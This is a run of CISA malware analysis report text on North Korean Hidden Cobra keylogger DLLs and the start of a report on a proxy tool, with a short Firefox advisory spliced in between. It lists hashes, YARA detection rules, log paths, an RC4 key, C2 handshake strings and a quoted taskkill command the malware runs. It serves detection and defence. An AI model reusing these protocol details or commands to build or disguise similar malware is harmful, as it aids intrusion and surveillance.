This file is a 64-bit dynamic link library (DLL). This malware uses 3 files that will be used to store the key logs, screen shots, and log intervals. The location of these logs can be found in C:windowstempTMP0389A.tmp.

–Begin Log Files–
1. Keylog: %temp%GoogleChromechromeupdate_pk
2. Screenshots: %temp%GoogleChromechromeupdate_ps_<YYYMMDD>_<HHMMSS>_<sss>_<ThreadID>
3. Log intervals: C:ProgramData2.dat
–End Log Files–

The malware creates 3 threads to populate the log files listed above. Each one will continue to execute until a global kill variable is set to 1. This variable can only be set to 1 by calling an export called “Process” from within this DLL. When the export is called, the threads will return and the program will exit.

32a4de070ca005d35a88503717157b0dc3f2e8da76ffd618fca6563aec9c81f8

Tags

HIDDEN-COBRAbackdoorkeyloggerreconnaissancescreen-capturespywaretrojan

Details

Name
PSLogger .dll

Size
138243 bytes

Type
PE32+ executable (DLL) (GUI) x86-64, for MS Windows

MD5
acd15f4393e96fe5eb920727dc083aed

SHA1
c92529097cad8996f3a3c8eb34b56273c29bdce5

SHA256
32a4de070ca005d35a88503717157b0dc3f2e8da76ffd618fca6563aec9c81f8

SHA512
82a946c2d0c9fffdd23d8e6b34028ac1b0368d4fd78302268aa4d954bead8a82ea15873a28d69946dceaf80fcafd0c52aeb59f47df5a029f77072fa1bc8e0fae

ssdeep
3072:t+N02CVLOJdCPQhVNRTzcb/YrgHdnG6ioaa5IR:sO2qO3CPkRTz8YrgHdGBoa1

Entropy
6.096652

Antivirus

Ahnlab
Trojan/Win64.Agent

Antiy
Trojan[Spy]/Win64.Agent

Avira
TR/Spy.Agent.ftmjo

BitDefender
Trojan.GenericKD.40337042

Comodo
Malware

Cyren
W64/Trojan.WFEO-4014

ESET
a variant of Win64/Spy.Agent.AP trojan

Emsisoft
Trojan.GenericKD.40337042 (B)

Ikarus
Trojan-Spy.Win64.Agent

K7
Spyware ( 00538f7c1 )

Lavasoft
Trojan.GenericKD.40337042

Microsoft Security Essentials
Trojan:Win32/Tiggre!plock

NANOAV
Trojan.Win64.Mlw.fgbtfv

Symantec
Trojan.Crobaruko

Systweak
malware.agent

Vir.IT eXplorer
Backdoor.Win32.Lazarus.BGM

VirusBlokAda
TrojanSpy.Win64.Agent

Zillya!
Trojan.Agent.Win64.2215

YARA Rules

rule CISA_3P_10301706_01 : HiddenCobra ECCENTRICBANDWAGON backdoor keylogger reconnaissance screencapture spyware trojan
{
   meta:
       Author = “CISA Trusted Third Party”
       Incident = “10301706.r1.v1”
       Date = “2020-08-11”
       Actor = “Hidden Cobra”
       Category = “Backdoor Keylogger Reconnaissance Screen-Capture Spyware Trojan”
       Family = “ECCENTRICBANDWAGON”
       Description = “Detects strings in ECCENTRICBANDWAGON proxy tool”
       MD5_1 = “d45931632ed9e11476325189ccb6b530”
       SHA256_1 = “efd470cfa90b918e5d558e5c8c3821343af06eedfd484dfeb20c4605f9bdc30e”
       MD5_2 = “acd15f4393e96fe5eb920727dc083aed”
       SHA256_2 = “32a4de070ca005d35a88503717157b0dc3f2e8da76ffd618fca6563aec9c81f8”
       MD5_3 = “34404a3fb9804977c6ab86cb991fb130”
       SHA256_3 = “c6930e298bba86c01d0fe2c8262c46b4fce97c6c5037a193904cfc634246fbec”
       MD5_4 = “3122b0130f5135b6f76fca99609d5cbe”
       SHA256_4 = “9ea5aa00e0a738b74066c61b1d35331170a9e0a84df1cc6cef58fd46a8ec5a2e”
   strings:
       $sn1 = { FB 19 9D 57 [1-6] 9A D1 D6 D1 [1-6] 42 9E D8 FD }
       $sn2 = { 4F 03 43 83 [1-6] 48 E0 1A 2E [1-6] 3B FD FD FD }
       $sn3 = { 68 56 68 9A [1-12] 4D E1 1F 25 [1-12] 3F 38 54 0F [1-12] 73 30 62 A1 [1-12] DB 39 BD 56 }
       $sn4 = “%s\chromeupdater_ps_%04d%02d%02d_%02d%02d%02d_%03d_%d” wide ascii nocase
       $sn5 = “c:\windows\temp\TMP0389A.tmp” wide ascii nocase
   condition:
       any of them
}

ssdeep Matches

100
efd470cfa90b918e5d558e5c8c3821343af06eedfd484dfeb20c4605f9bdc30e

PE Metadata

Compile Date
2018-04-27 22:53:06-04:00

Import Hash
f0faa229b086ea5053b4268855f0c8ba

PE Sections

MD5
Name
Raw Size
Entropy

09745305cbad67b17346f0f6dba1e700
header
1024
2.729080

5c2242b56a31d64b6ce82671d97a82a4
.text
92160
6.415763

0d022eff24bc601d97d2088b4179bd18
.rdata
31232
4.934652

578e5078ccb878f1aa9e309b4cfc2be5
.data
6144
2.115729

09924946b47ef078f7e9af4f4fcb59dc
.pdata
5632
4.803615

7ead0113095bc6cb3b2d82f05fda25f3
.rsrc
512
5.115767

7937397e0a31cdc87f5b79074825e18e
.reloc
1536
2.931043

Description

This file is a 64-bit DLL. This sample and “efd470cfa90b918e5d558e5c8c3821343af06eedfd484dfeb20c4605f9bdc30e” are nearly identical with the only difference being that this sample has 3 extra NULL bytes at the end of the file.

This malware uses 3 files that will be used to store the key logs, screen shots, and log intervals. The location of these logs can be found in C:windowstempTMP0389A.tmp.

–Begin Log Files–
1. Keylog: %temp%GoogleChromechromeupdate_pk
2. Screenshots: %temp%GoogleChromechromeupdate_ps_<YYYMMDD>_<HHMMSS>_<sss>_<ThreadID>
3. Log intervals: C:ProgramData2.dat
–End Log Files–

The malware creates 3 threads to populate the log files listed above. Each one will continue to execute until a global kill variable is set to 1. This variable can only be set to 1 by calling an export called “Process” from within this DLL. When the export is called, the threads will return and the program will exit.

c6930e298bba86c01d0fe2c8262c46b4fce97c6c5037a193904cfc634246fbec

Tags

HIDDEN-COBRAbackdoorkeyloggerreconnaissancescreen-capturetrojan

Details

Name
PSLogger .dll

Size
175104 bytes

Type
PE32 executable (GUI) Intel 80386, for MS Windows

MD5
34404a3fb9804977c6ab86cb991fb130

SHA1
b345e6fae155bfaf79c67b38cf488bb17d5be56d

SHA256
c6930e298bba86c01d0fe2c8262c46b4fce97c6c5037a193904cfc634246fbec

SHA512
01a8c8b66f6895387c6a347d02d00ea09619888f2727096a19d4c4ff50e6bf72367cbd41f09e89a57f7f3862efbb2db8177dbec086c4ce2aca3518d124575033

ssdeep
3072:AeO51bvWZElWhKQGhvNdx2GYZj+utNfBtZl7mGwwZWyNGVxBqu:A77beClWhKQG36UutNfB077Bqu

Entropy
6.491987

Antivirus

Ahnlab
Malware/Gen.Generic

Antiy
GrayWare/Win32.Presenoker

BitDefender
Trojan.GenericKD.43188225

Cyren
W32/Trojan.MZDN-2436

ESET
a variant of Generik.HKZTFCG trojan

Emsisoft
Trojan.GenericKD.43188225 (B)

Ikarus
Trojan.SuspectCRC

K7
Trojan ( 005506c81 )

Lavasoft
Trojan.GenericKD.43188225

NANOAV
Trojan.Win32.KeyLogger.fnwztc

NetGate
Malware.Generic

Symantec
Hacktool.Keylogger

Vir.IT eXplorer
Backdoor.Win32.Lazarus.BGM

VirusBlokAda
TrojanSpy.Keylogger

Zillya!
Trojan.Keylogger.Win32.9

YARA Rules

rule CISA_3P_10301706_01 : HiddenCobra ECCENTRICBANDWAGON backdoor keylogger reconnaissance screencapture spyware trojan
{
   meta:
       Author = “CISA Trusted Third Party”
       Incident = “10301706.r1.v1”
       Date = “2020-08-11”
       Actor = “Hidden Cobra”
       Category = “Backdoor Keylogger Reconnaissance Screen-Capture Spyware Trojan”
       Family = “ECCENTRICBANDWAGON”
       Description = “Detects strings in ECCENTRICBANDWAGON proxy tool”
       MD5_1 = “d45931632ed9e11476325189ccb6b530”
       SHA256_1 = “efd470cfa90b918e5d558e5c8c3821343af06eedfd484dfeb20c4605f9bdc30e”
       MD5_2 = “acd15f4393e96fe5eb920727dc083aed”
       SHA256_2 = “32a4de070ca005d35a88503717157b0dc3f2e8da76ffd618fca6563aec9c81f8”
       MD5_3 = “34404a3fb9804977c6ab86cb991fb130”
       SHA256_3 = “c6930e298bba86c01d0fe2c8262c46b4fce97c6c5037a193904cfc634246fbec”
       MD5_4 = “3122b0130f5135b6f76fca99609d5cbe”
       SHA256_4 = “9ea5aa00e0a738b74066c61b1d35331170a9e0a84df1cc6cef58fd46a8ec5a2e”
   strings:
       $sn1 = { FB 19 9D 57 [1-6] 9A D1 D6 D1 [1-6] 42 9E D8 FD }
       $sn2 = { 4F 03 43 83 [1-6] 48 E0 1A 2E [1-6] 3B FD FD FD }
       $sn3 = { 68 56 68 9A [1-12] 4D E1 1F 25 [1-12] 3F 38 54 0F [1-12] 73 30 62 A1 [1-12] DB 39 BD 56 }
       $sn4 = “%s\chromeupdater_ps_%04d%02d%02d_%02d%02d%02d_%03d_%d” wide ascii nocase
       $sn5 = “c:\windows\temp\TMP0389A.tmp” wide ascii nocase
   condition:
       any of them
}

ssdeep Matches

No matches found.

PE Metadata

Compile Date
2018-11-14 09:44:18-05:00

Import Hash
a8623b2da60776df129ebe0430d48d85

PE Sections

MD5
Name
Raw Size
Entropy

37ecb293f01edad89fcee1ce48e4cde3
header
1024
2.949326

36fd9d805b7c591ab71eda922662e30a
.text
124928
6.650973

1d3132305f18961b86c1fda0a2f4eea9
.rdata
38912
5.166660

9e17ac76df46fd523a11378398cf026f
.data
3072
2.367308

bbee55723eaad8c7f73a5fa9bf2159d4
.gfids
512
2.275750

264e317304c9b21a342169b33c0a791a
.rsrc
512
4.717679

a1ab3dce319437b49198eeff43f4d847
.reloc
6144
6.422499

Packers/Compilers/Cryptors

Microsoft Visual C++ ?.?

Description

This sample is nearly identical to “efd470cfa90b918e5d558e5c8c3821343af06eedfd484dfeb20c4605f9bdc30e” with the exception that this sample will RC4 encrypt some of its strings and use different log files.

The following strings are RC4 encrypted with the key “key”:

–Begin RC4 encrypted strings–
Downloads
c:windowstempTMP0389A.tmp
c:windowstemptmp1105.tmp
[CLIPBOARD]
[/CLIPBOARD]
–End RC4 encrypted strings–

This malware uses 3 files that will be used to store the key logs, screen shots, and log intervals. The location of these logs can be found in C:windowstempTMP0389A.tmp.

–Begin log files–
1. Keylog: %temp%Downloadstmp_<USERNAME>
2. Screenshots: %temp%Downloadstmp_<USERNAME>_<MMDD>_<HHMMSS>
3. Log intervals: c:windowstemptmp1105.tmp
–End log files–

The malware creates 3 threads to populate the log files listed above. Each one will continue to execute until a global kill variable is set to 1. This variable can only be set to 1 by calling an export called “Process” from within this DLL. When the export is called, the threads will return and the program will exit.

9ea5aa00e0a738b74066c61b1d35331170a9e0a84df1cc6cef58fd46a8ec5a2e

Tags

HIDDEN-COBRAkeyloggerreconnaissancescreen-capturespywaretrojan

Details

Name
PSLogger .dll

Size
210944 bytes

Type
PE32+ executable (DLL) (GUI) x86-64, for MS Windows

MD5
3122b0130f5135b6f76fca99609d5cbe

SHA1
ce6bc34b887d60f6d416a05d5346504c54cff030

SHA256
9ea5aa00e0a738b74066c61b1d35331170a9e0a84df1cc6cef58fd46a8ec5a2e

SHA512
788c666efeb664c7691a958d15eac2b80d3d17241f5e7c131e5dec2f761bcb70950018c1f8a85fd6600eff0d0fab0ce31fbcd364d16b6ef8b54deb5e9c215f08

ssdeep
3072:6usGRlrmZ8LP/LqdmpWOY9Y9EbyBFWnqD5W3P4Tp31oItN7W0rVu6eRDP/fJkkj7:67GTjOdCWOKXbyCnCEQTp2CE0/gh2W

Entropy
6.246368

Antivirus

Ahnlab
Trojan/Win64.Redbanc

Antiy
Trojan[Banker]/Win32.Alreay

Avira
TR/Spy.Agent.kdvkr

BitDefender
Trojan.GenericKD.41368668

ESET
a variant of Win64/Spy.Agent.BG trojan

Emsisoft
Trojan.GenericKD.41368668 (B)

Ikarus
Trojan-Spy.Keylogger.Lazarus

K7
Spyware ( 005501401 )

Lavasoft
Trojan.GenericKD.41368668

McAfee
RDN/Generic PWS.tf

NANOAV
Trojan.Win64.Alreay.hoqvyj

Quick Heal
Trojan.Alreay

Sophos
Troj/Alreay-A

TACHYON
Unknown-Type/Alreay.210944

Zillya!
Trojan.Alreay.Win32.91

YARA Rules

rule CISA_3P_10301706_01 : HiddenCobra ECCENTRICBANDWAGON backdoor keylogger reconnaissance screencapture spyware trojan
{
   meta:
       Author = “CISA Trusted Third Party”
       Incident = “10301706.r1.v1”
       Date = “2020-08-11”
       Actor = “Hidden Cobra”
       Category = “Backdoor Keylogger Reconnaissance Screen-Capture Spyware Trojan”
       Family = “ECCENTRICBANDWAGON”
       Description = “Detects strings in ECCENTRICBANDWAGON proxy tool”
       MD5_1 = “d45931632ed9e11476325189ccb6b530”
       SHA256_1 = “efd470cfa90b918e5d558e5c8c3821343af06eedfd484dfeb20c4605f9bdc30e”
       MD5_2 = “acd15f4393e96fe5eb920727dc083aed”
       SHA256_2 = “32a4de070ca005d35a88503717157b0dc3f2e8da76ffd618fca6563aec9c81f8”
       MD5_3 = “34404a3fb9804977c6ab86cb991fb130”
       SHA256_3 = “c6930e298bba86c01d0fe2c8262c46b4fce97c6c5037a193904cfc634246fbec”
       MD5_4 = “3122b0130f5135b6f76fca99609d5cbe”
       SHA256_4 = “9ea5aa00e0a738b74066c61b1d35331170a9e0a84df1cc6cef58fd46a8ec5a2e”
   strings:
       $sn1 = { FB 19 9D 57 [1-6] 9A D1 D6 D1 [1-6] 42 9E D8 FD }
       $sn2 = { 4F 03 43 83 [1-6] 48 E0 1A 2E [1-6] 3B FD FD FD }
       $sn3 = { 68 56 68 9A [1-12] 4D E1 1F 25 [1-12] 3F 38 54 0F [1-12] 73 30 62 A1 [1-12] DB 39 BD 56 }
       $sn4 = “%s\chromeupdater_ps_%04d%02d%02d_%02d%02d%02d_%03d_%d” wide ascii nocase
       $sn5 = “c:\windows\temp\TMP0389A.tmp” wide ascii nocase
   condition:
       any of them
}

ssdeep Matches

No matches found.

PE Metadata

Compile Date
2019-04-08 07:26:25-04:00

Import Hash
b113cba285f3c4ed179422f54692f4e3

PE Sections

MD5
Name
Raw Size
Entropy

fd81e5f6ab156dcdba2e2b92826ca192
header
1024
3.015020

88ecd4fac45e45b294de415ca514a93c
.text
137728
6.457660

af0dab081123c1ad835c86f134138e7f
.rdata
57344
5.118317

e7c661026f7ecf701bbcbdd15ff2b825
.data
3584
2.244033

4b406030a4a3dcaea845c14124010691
.pdata
8192
5.172064

f623a10ca467aac404ec6fda8e4810d4
.gfids
512
2.000422

3695113543a23c53791caa70b4bd8874
.rsrc
512
4.724729

f9f31f1689409c8834b7f0c28d948a65
.reloc
2048
4.924204

Description

This sample is nearly identical to “c6930e298bba86c01d0fe2c8262c46b4fce97c6c5037a193904cfc634246fbec” with the exception that it RC4 encrypts some of its strings, uses different log files, and has a simple cleanup routine.

The following strings are RC4 encrypted with the key “key”:

–Begin RC4 encrypted strings–
TrendMicroUpdate
c:windowstempTMP0389A.tmp
c:windowstemptmp1105.tmp
[CLIPBOARD]
[/CLIPBOARD]
–End RC4 encrypted strings–

This malware uses 3 files that will be used to store the key logs, screen shots, and log intervals. The location of these logs can be found in C:windowstempTMP0389A.tmp.

–Begin log files–
1. Keylog: %temp%TrendMicroUpdateupdate_<USERNAME>
2. Screenshots: %temp%TrendMicroUpdateupdate_<MMDD>_<HHMMSSl>
3. Log Intervals: c:windowstemptmp1105.tmp
–End log files–

This malware creates 3 threads to populate the log files listed above. Each one will continue to execute until the file C:windowstemptmp0207 contains a zero in a particular location. At this point, the program will signal an exit to the other threads and begin a cleanup thread. The cleanup thread will delete C:windowstemptmp0207 and then call WinExec(cmd.exe /c taskkill /f /im explorer.exe). This will crash explorer.exe, which could potentially alert a user who was using the device at the time.

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

Maintain up-to-date antivirus signatures and engines.
Keep operating system patches up-to-date.
Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
Enforce a strong password policy and implement regular password changes.
Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
Disable unnecessary services on agency workstations and servers.
Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
Scan all software downloaded from the Internet prior to executing.
Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

1-888-282-0870

CISA Service Desk (UNCLASS)

CISA SIPR (SIPRNET)

CISA IC (JWICS)

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

Web: https://malware.us-cert.gov

E-Mail: submit@malware.us-cert.gov

FTP: ftp.malware.us-cert.gov (anonymous)

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: August 26, 2020Mozilla has released security updates to address vulnerabilities in Firefox and Firefox ESR. An attacker could exploit some of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Mozilla Security Advisories for Firefox 80, Firefox ESR 68.12, and Firefox ESR 78.2 and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: August 26, 2020Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

This Malware Analysis Report (MAR) is the result of analytic efforts between the Department of Homeland Security (DHS), the Federal Bureau of Investigation (FBI), and the Department of Defense (DoD). Working with U.S. Government partners, DHS, FBI, and DoD identified Remote Access Tool (RAT) malware variants used by the North Korean government. This malware variant has been identified as VIVACIOUSGIFT. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit https[:]//www[.]us-cert.gov/hiddencobra.

FBI has high confidence that HIDDEN COBRA actors are using malware variants in conjunction with proxy servers to maintain a presence on victim networks and to further network exploitation. DHS, FBI, and DoD are distributing this MAR to enable network defense and reduce exposure to North Korean government malicious cyber activity.

This MAR includes malware descriptions related to HIDDEN COBRA, suggested response actions and recommended mitigation techniques. Users or administrators should flag activity associated with the malware and report the activity to the Cybersecurity and Infrastructure Security Agency (CISA) or the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation.

This report looks at the malware samples known as VIVACIOUSGIFT that is used by advanced persistent threat (APT) cyber actors as a network proxy tool. The proxy requires an encrypted command line argument for its source and destination Internet Protocol (IP) addresses and has command and control (C2) functionality to retrieve and set the destination IP. The command line argument can also contain a source proxy IP, port, and password. The source proxy is used as an additional proxy when communicating with the source IP. The library libcurl version 7.94.1 is used when communicating with the source proxy.

For a downloadable copy of IOCs, see [STIX file].

Submitted Files (6)

70b494b0a8fdf054926829dcb3235fc7bd0346b6a19faf2a57891c71043b3b38 (70b494b0a8fdf054926829dcb3235f…)

8cad61422d032119219f465331308c5a61e21c9a3a431b88e1f8b25129b7e2a1 (8cad61422d032119219f465331308c…)

9a776b895e93926e2a758c09e341accb9333edc1243d216a5e53f47c6043c852 (9a776b895e93926e2a758c09e341ac…)

a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118 (a917c1cc198cf36c0f2f6c24652e5c…)

aca598e2c619424077ef8043cb4284729045d296ce95414c83ed70985c892c83 (aca598e2c619424077ef8043cb4284…)

f3ca8f15ca582dd486bd78fd57c2f4d7b958163542561606bebd250c827022de (f3ca8f15ca582dd486bd78fd57c2f4…)

Findings

a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118

Tags

HIDDEN-COBRAproxytrojan

Details

Name
a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118

Size
408576 bytes

Type
PE32 executable (GUI) Intel 80386, for MS Windows

MD5
40e698f961eb796728a57ddf81f52b9a

SHA1
50b4f9a8fa6803f0aabb6fd9374244af40c2ba4c

SHA256
a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118

SHA512
2ee35d902f2a4022488bdc75cf7531f75de7e8bb4ca8645a9448f33051e835f0cea62e0157ac292187cd9406901f80570b8e17be52fee4a23f3c1aaa1a171cda

ssdeep
12288:E30MB7N+man4IrT0qhPyRg8o//ND6lAMYqcl:i0YNwrT0qhPFtHN2lLYq

Entropy
6.651902

Antivirus

Ahnlab
Trojan/Win32.Banker

Antiy
Trojan[Banker]/Win32.Agent

Avira
TR/SpyBanker.Agent.AM

BitDefender
Trojan.GenericKD.4446633

ClamAV
Win.Trojan.Agent-6971031-0

Comodo
TrojWare.Win32.Ransom.Teerac.C

Cyren
W32/Banker.FTBC-3937

ESET
Win32/Spy.Banker.ADRO trojan

Emsisoft
Trojan.GenericKD.4446633 (B)

Ikarus
Trojan-Spy.Banker

K7
Riskware ( 0040eff71 )

Lavasoft
Trojan.GenericKD.4446633

McAfee
Generic.abb

Microsoft Security Essentials
TrojanSpy:Win32/Banker

NANOAV
Trojan.Win32.Agent.enikaf

Quick Heal
TrojanSpy.Banker

Sophos
Mal/Generic-L

Symantec
Trojan Horse

TrendMicro
BKDR_KL.89AB2FB2

TrendMicro House Call
BKDR_KL.89AB2FB2

Vir.IT eXplorer
Trojan.Win32.Banker.FUW

VirusBlokAda
TrojanBanker.Agent

Zillya!
Trojan.Agent.Win32.763316

YARA Rules

rule CISA_3P_10301706_02 : HiddenCobra TWOPENCE backdoor dropper proxy spyware trojan
{
   meta:
       Author = “CISA Trusted Third Party”
       Incident = “10301706.r2.v1”
       Date = “2020-08-11”
       Actor = “Hidden Cobra”
       Category = “Backdoor Dropper Proxy Spyware Trojan”
       Family = “TWOPENCE”
       Description = “Detects strings in TWOPENCE proxy tool”
       MD5_1 = “40e698f961eb796728a57ddf81f52b9a”
       SHA256_1 = “a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118”
       MD5_2 = “dfd09e91b7f86a984f8687ed6033af9d”
       SHA256_2 = “aca598e2c619424077ef8043cb4284729045d296ce95414c83ed70985c892c83”
       MD5_3 = “bda82f0d9e2cb7996d2eefdd1e5b41c4”
       SHA256_3 = “f3ca8f15ca582dd486bd78fd57c2f4d7b958163542561606bebd250c827022de”
       MD5_4 = “97aaf130cfa251e5207ea74b2558293d”
       SHA256_4 = “9a776b895e93926e2a758c09e341accb9333edc1243d216a5e53f47c6043c852”
       MD5_5 = “889e320cf66520485e1a0475107d7419”
       SHA256_5 = “8cad61422d032119219f465331308c5a61e21c9a3a431b88e1f8b25129b7e2a1”
   strings:
       $cmd1 = “ssylka”
       $cmd2 = “ustanavlivat”
       $cmd3 = “poluchit”
       $cmd4 = “pereslat”
       $cmd5 = “derzhat”
       $cmd6 = “vykhodit”
       $cmd7 = “Nachalo”
       $cmd8 = “kliyent2podklyuchit”
       $frmt1 = “Host: %s%s%s:%hu”
       $frmt2 = “%s%s%s%s%s%s%s%s%s%s”
   condition:
       (4 of ($cmd*)) and (1 of ($frmt*))
}

ssdeep Matches

No matches found.

PE Metadata

Compile Date
2016-07-08 19:11:36-04:00

Import Hash
3415ed7e09a44243bcabe4422aeef7dc

PE Sections

MD5
Name
Raw Size
Entropy

0e135280ecde05507a86c5681ee38986
header
1024
2.480337

dfcc176fede07939cc4deb950858b6ce
.text
333824
6.579572

d72f6b9398a7f267dfe5f1bd44778d62
.rdata
51712
6.391152

1e41f003bafe97cb5bfb59b3ad7d7531
.data
6656
3.459925

a8d51b81460671e8fb3df438f0f7fc28
.reloc
15360
5.531184

Packers/Compilers/Cryptors

Microsoft Visual C++ ?.?

Description

This file is a 32-bit Windows executable. The proxy requires a single command line argument. The argument can consist of a maximum of four encrypted strings delineated with the pipe character (“|”). When the four strings are parsed and decrypted, the strings represent the following: source IP and port, destination IP and port, source proxy IP and port, and source proxy password. The IP and port strings have the following format: <IP:port>. If the destination IP is missing from the command line argument, the proxy will wait to get the destination IP from the actor. The source proxy IP and port, as well as the source proxy password, are used as an additional proxy when communicating with the source IP. When communicating with the source proxy, the proxy will use libcurl with the options CURLOPT_HTTPPROXYTUNNEL and CURLOPT_NOBODY.

The following is an example of an encrypted command line argument that is missing the destination IP:

–Begin encrypted command line argument–
<encrypted_string>| |<encrypted_string>|<encrypted_string>
–End encrypted command line argument–

–Begin decrypted command line argument–
<IP>:<port>| |<IP>:<port>|<password>
–End decrypted command line argument–

The encrypted strings inside the command line argument can be individually decrypted with the Python script provided in Figure 1.

Below is the flow of events that happens when the proxy starts and is issued the commands “ustanavlivat” and “pereslat”. In the following example, the command line argument does not contain a source proxy. The command line argument can contain a source proxy IP, port, and password. If they exist, the proxy will route all traffic to the source IP through the source proxy. When communicating with the source proxy, the proxy uses the library libcurl with options CURLOPT_HTTPPROXYTUNNEL and CURLOPT_NOBODY. The data that is sent and received is encrypted using a custom encryption routine.

First, it connects to source IP and sends initialization message “Nachalo”. It sends a custom hash of “Dazdrav$958478Zohsf9q@%5555ahshdnZXniohs”. In return it receives two bytes of data. It sends the length (4 bytes) of string “kliyent2podklyuchit” and then sends the string “kliyent2podklyuchit”. It sends the length (4 bytes) of string “Nachalo” and then sends the “Nachalo”.

Next, it receives C2 command “ustanavlivat” to set the destination IP address. It receives and decrypts the length of the string “ustanavlivat” and then receives and decrypts the string “ustanavlivat”.

Then, it receives C2 command “pereslat” to start the proxy functionality. It receives and decrypts the length of the string “pereslat” and then receives and decrypts the string “pereslat”.

Next, it connects to source IP and sends start proxy functionality message “ssylka”. It sends a custom hash of “Dazdrav$958478Zohsf9q@%5555ahshdnZXniohs”. In response it receives data. Then it sends the length (4 bytes) of string “kliyent2podklyuchit” and then sends the string “kliyent2podklyuchit”. Then it sends the length (4 bytes) of string “ssylka” and then sends the string “ssylka”.

Finally, it connects to destination IP and starts proxy functionality between source and destination IP.

The proxy uses a custom encryption routine to encode the data sent. The Python script provided in Figure 2 can decode the data.

Screenshots

Figure 1 – The Python script to individually decrypt the encrypted strings inside the command line argument.

Figure 2 – The Python script to decode the encoded data sent by the proxy custom encryption routine.

aca598e2c619424077ef8043cb4284729045d296ce95414c83ed70985c892c83

Tags

HIDDEN-COBRAdropperproxyspywaretrojan

Details

Name
aca598e2c619424077ef8043cb4284729045d296ce95414c83ed70985c892c83

Size
232960 bytes

Type
PE32 executable (GUI) Intel 80386, for MS Windows

MD5
dfd09e91b7f86a984f8687ed6033af9d

SHA1
b8fe7884d2dc4983fb0fbca192694ce2f4685e23

SHA256
aca598e2c619424077ef8043cb4284729045d296ce95414c83ed70985c892c83

SHA512
641dd95c101ae7566defb1a24279badb8c7aa94331442e0f470866b6a1e44c8790a71e83cc1cb188d7530c08bf0e5d227d35caa9a2cf7e54d2f7319381af2d84

ssdeep
3072:XU5r72JE+FYWR0jZLShk4cPT/QzSaQ0sCFneZTznIhZJJcrJ1GHeV9:XU5uJpYnZL05STQNddFnAnGZIrV

Entropy
6.524225

Antivirus

Ahnlab
Trojan/Win32.Alreay

Antiy
Trojan[Banker]/Win32.Alreay

ClamAV
Win.Trojan.Agent-6971031-0

Comodo
TrojWare.Win32.TrojanDropper.Agent.PRQ

Cyren
W32/Alreay.SQQX-6406

ESET
a variant of Win32/Spy.Banker.ADRO trojan

K7
Spyware ( 005198041 )

McAfee
GenericRXFQ-MX!DFD09E91B7F8

Microsoft Security Essentials
TrojanSpy:Win32/Banker!dha

Symantec
Trojan Horse

TrendMicro
TSPY_BA.C25E7684

TrendMicro House Call
TSPY_BA.C25E7684

Zillya!
Trojan.Alreay.Win32.42

YARA Rules

rule CISA_3P_10301706_02 : HiddenCobra TWOPENCE backdoor dropper proxy spyware trojan
{
   meta:
       Author = “CISA Trusted Third Party”
       Incident = “10301706.r2.v1”
       Date = “2020-08-11”
       Actor = “Hidden Cobra”
       Category = “Backdoor Dropper Proxy Spyware Trojan”
       Family = “TWOPENCE”
       Description = “Detects strings in TWOPENCE proxy tool”
       MD5_1 = “40e698f961eb796728a57ddf81f52b9a”
       SHA256_1 = “a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118”
       MD5_2 = “dfd09e91b7f86a984f8687ed6033af9d”
       SHA256_2 = “aca598e2c619424077ef8043cb4284729045d296ce95414c83ed70985c892c83”
       MD5_3 = “bda82f0d9e2cb7996d2eefdd1e5b41c4”
       SHA256_3 = “f3ca8f15ca582dd486bd78fd57c2f4d7b958163542561606bebd250c827022de”
       MD5_4 = “97aaf130cfa251e5207ea74b2558293d”
       SHA256_4 = “9a776b895e93926e2a758c09e341accb9333edc1243d216a5e53f47c6043c852”
       MD5_5 = “889e320cf66520485e1a0475107d7419”
